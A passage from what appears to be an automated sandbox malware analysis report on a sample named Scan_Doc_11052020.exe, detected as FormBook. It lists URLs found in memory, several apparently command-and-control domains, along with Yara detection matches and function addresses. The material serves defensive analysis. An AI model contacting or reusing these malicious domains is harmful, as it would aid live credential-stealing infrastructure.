00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.dearisorealestate.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.dearisorealestate.com/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.dearisorealestate.com/mq3/www.r2019.biz Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.dearisorealestate.comReferer: Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.dllearn.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.dllearn.com/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.dllearn.com/mq3/www.axcyl.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.dllearn.comReferer: Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.hellsoasis.net Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.hellsoasis.net/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.hellsoasis.net/mq3/www.meetlove94.life Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.hellsoasis.netReferer: Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.meetlove94.life Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.meetlove94.life/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.meetlove94.lifeReferer: Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmp String found in binary or memory: http://www.mipcms.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.mymtaporta.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.mymtaporta.com/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.mymtaporta.com/mq3/www.smsjtj.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.mymtaporta.comReferer: Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.porcber.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.porcber.com/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.porcber.com/mq3/www.hellsoasis.net Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.porcber.comReferer: Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.r2019.biz Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.r2019.biz/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.r2019.biz/mq3/www.mymtaporta.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.r2019.bizReferer: Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.samdeng.works Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.samdeng.works/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.samdeng.works/mq3/www.xavnzfw.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.samdeng.worksReferer: Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.shimi783.info Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.shimi783.info/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.shimi783.info/mq3/www.dearisorealestate.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.shimi783.infoReferer: Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.smsjtj.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.smsjtj.com/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.smsjtj.com/mq3/www.carnescolombia.services Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.smsjtj.comReferer: Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.xavnzfw.com Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.xavnzfw.com/mq3/ Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.xavnzfw.com/mq3/www.brandbank.news Source: explorer.exe, 00000002.00000003.1095683260.000000000EC12000.00000004.00000001.sdmp String found in binary or memory: http://www.xavnzfw.comReferer: Source: explorer.exe, 00000002.00000000.820703019.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmp String found in binary or memory: https://m.baidu.com/ Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmp String found in binary or memory: https://mipcache.bdstatic.com/static/v1/mip-stats-baidu/mip-stats-baidu.js Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmp String found in binary or memory: https://mipcache.bdstatic.com/static/v1/mip.css Source: systray.exe, 00000004.00000002.1201505195.00000000056DF000.00000004.00000001.sdmp String found in binary or memory: https://mipcache.bdstatic.com/static/v1/mip.js

E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE

System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Initial sample is a PE file and has a suspicious name Show sources
 Source: initial sample Static PE information: Filename: Scan_Doc_11052020.exe
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_00AB8B80 0_2_00AB8B80 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_00AB2050 0_2_00AB2050 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F71DE3 0_2_05F71DE3 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F8D5D2 0_2_05F8D5D2 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F7FDDB 0_2_05F7FDDB Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F8E581 0_2_05F8E581 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F6E58A 0_2_05F6E58A Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EC0D40 0_2_05EC0D40 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F6C53F 0_2_05F6C53F Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EE1530 0_2_05EE1530 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F92519 0_2_05F92519 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F81D1B 0_2_05F81D1B Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F844EF 0_2_05F844EF Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F8DCC5 0_2_05F8DCC5 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F92C9A 0_2_05F92C9A Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F91C9F 0_2_05F91C9F Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F83490 0_2_05F83490 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF547E 0_2_05EF547E Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F7F42B 0_2_05F7F42B Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05ED740C 0_2_05ED740C Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EE1410 0_2_05EE1410 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F91FCE 0_2_05F91FCE Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EC67D0 0_2_05EC67D0 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F82782 0_2_05F82782 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EE5790 0_2_05EE5790 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F91746 0_2_05F91746 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F926F8 0_2_05F926F8 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F83E96 0_2_05F83E96 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF4E61 0_2_05EF4E61 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F8CE66 0_2_05F8CE66 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF5E70 0_2_05EF5E70 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EE7640 0_2_05EE7640 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF6611 0_2_05EF6611 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F919E2 0_2_05F919E2 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F861DF 0_2_05F861DF Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F9D9BE 0_2_05F9D9BE Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF6180 0_2_05EF6180 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF594B 0_2_05EF594B Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F19906 0_2_05F19906 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF7110 0_2_05EF7110 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F928E8 0_2_05F928E8 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF48CB 0_2_05EF48CB Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F718B6 0_2_05F718B6 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EDA080 0_2_05EDA080 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF1070 0_2_05EF1070 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF0021 0_2_05EF0021 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EFE020 0_2_05EFE020 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F8D016 0_2_05F8D016 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF9810 0_2_05EF9810 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05ECEBE0 0_2_05ECEBE0 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF63C2 0_2_05EF63C2 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF4B96 0_2_05EF4B96 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EEFB40 0_2_05EEFB40 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F922DD 0_2_05F922DD Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EE42B0 0_2_05EE42B0 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F91A99 0_2_05F91A99 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF4A5B 0_2_05EF4A5B Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05EF523D 0_2_05EF523D Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F9E214 0_2_05F9E214 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F80A02 0_2_05F80A02 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E244EF 4_2_04E244EF Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E2DCC5 4_2_04E2DCC5 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E23490 4_2_04E23490 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E32C9A 4_2_04E32C9A Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E31C9F 4_2_04E31C9F Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D9547E 4_2_04D9547E Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D81410 4_2_04D81410 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E1F42B 4_2_04E1F42B Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D7740C 4_2_04D7740C Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E11DE3 4_2_04E11DE3 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E2D5D2 4_2_04E2D5D2 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E1FDDB 4_2_04E1FDDB Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E2E581 4_2_04E2E581 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E0E58A 4_2_04E0E58A Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D60D40 4_2_04D60D40 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E0C53F 4_2_04E0C53F Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D81530 4_2_04D81530 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E21D1B 4_2_04E21D1B Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E32519 4_2_04E32519 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E326F8 4_2_04E326F8 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E23E96 4_2_04E23E96 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E2CE66 4_2_04E2CE66 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D87640 4_2_04D87640 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D95E70 4_2_04D95E70 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D94E61 4_2_04D94E61 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D96611 4_2_04D96611 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D667D0 4_2_04D667D0 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E31FCE 4_2_04E31FCE Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D85790 4_2_04D85790 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E22782 4_2_04E22782 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E31746 4_2_04E31746 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E328E8 4_2_04E328E8 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D948CB 4_2_04D948CB Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D7A080 4_2_04D7A080 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E118B6 4_2_04E118B6 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D91070 4_2_04D91070 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D99810 4_2_04D99810 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E2D016 4_2_04E2D016 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D90021 4_2_04D90021 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D9E020 4_2_04D9E020 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E319E2 4_2_04E319E2 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E261DF 4_2_04E261DF Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D96180 4_2_04D96180 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E3D9BE 4_2_04E3D9BE Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D9594B 4_2_04D9594B Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D97110 4_2_04D97110 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04DB9906 4_2_04DB9906 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E322DD 4_2_04E322DD Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D842B0 4_2_04D842B0 Source: C:\Windows\SysWOW64\systray.exe Code function: 